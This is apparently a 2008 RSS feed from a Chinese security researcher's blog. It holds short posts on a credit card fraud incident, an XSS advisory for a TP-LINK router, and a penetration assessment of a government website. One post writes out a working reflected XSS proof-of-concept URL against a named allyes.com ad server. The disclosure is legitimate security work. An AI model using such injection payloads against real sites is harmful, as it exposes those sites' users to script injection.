<![CDATA[每天……]]> http://hi.baidu.com http://hi.baidu.com http://img.baidu.com/img/logo-hi.gif http://hi.baidu.com/nansec zh-cn www.baidu.com 5 <![CDATA[信用卡欺诈]]> 刚办的卡,还没有开卡就有人打电话说被透支1万了,囧。


类别:默认分类 查看评论]]> 2008-09-25 13:01 http://hi.baidu.com/nansec/blog/item/49bfdf95484f184dd1135efb.html <![CDATA[allyes.com跨站漏洞]]> 愚乐一下

http://44.adsina.allyes.com/main/adfshow?user=AFP6_for_SINA|Home|HomePV&db=sina&local=yes&border=0-->'");></SCRIPT></style></title><SCRIPT>alert('http://hi.baidu.com/nansec');</SCRIPT>


类别:默认分类 查看评论]]> 2008-09-04 10:30 http://hi.baidu.com/nansec/blog/item/9a5d75d9f022d02a10df9be0.html <![CDATA[TP-LINK路由跨站点脚本漏洞]]> TP-LINK路由器跨站脚本漏洞

漏洞发现:

杭州安恒安全小组


测试版本:

TL-R402系列


描述:

TP-LINK是深圳市普联技术有限公司推出的路由器产品。
TP-LINK在处理用户请求时存在验证缺陷,远程攻击者可能利用此漏洞在用户浏览器中执行恶意代码。

厂商:

www.tp-link.com.cn


测试方法:

http://ip/<script

阅读全文
类别:Advisory 查看评论]]> 2008-08-12 14:12 http://hi.baidu.com/nansec/blog/item/5c337b8143e352debd3e1e18.html <![CDATA[奥运金保障之XX文化厅评估一二]]> 第一次评估,

发现后台弱口令、上传任意文件到任意目录。

站内搜索的目录遍历漏洞。

之后他们自己加固了一次,修复了上面的漏洞。

第二次评估,

鉴于他们已经做过加固,所以上面的一些漏洞已经修复。

查询了一下他们的子站。

有个XXXXX的子域名,一看就知道是用于测试的。

不过没有连接数据库所以测试网站的后台是没法登录的。

意外的收获是管理员自己写了一个目录浏览的页面-=

查看xxxx子域名的目录结构,和主站的基本上一致。

尝试访问了一下之

阅读全文
类别:默认分类 查看评论]]> 2008-08-01 12:10 http://hi.baidu.com/nansec/blog/item/8ac0460f5d67fa2c6159f355.html <![CDATA[自省]]> 在同一个地方失败两次,应该反省一下了.


类别:自言自语 查看评论]]> 2008-07-29 19:35 http://hi.baidu.com/nansec/blog/item/5a0c7238aae1b72597ddd8ad.html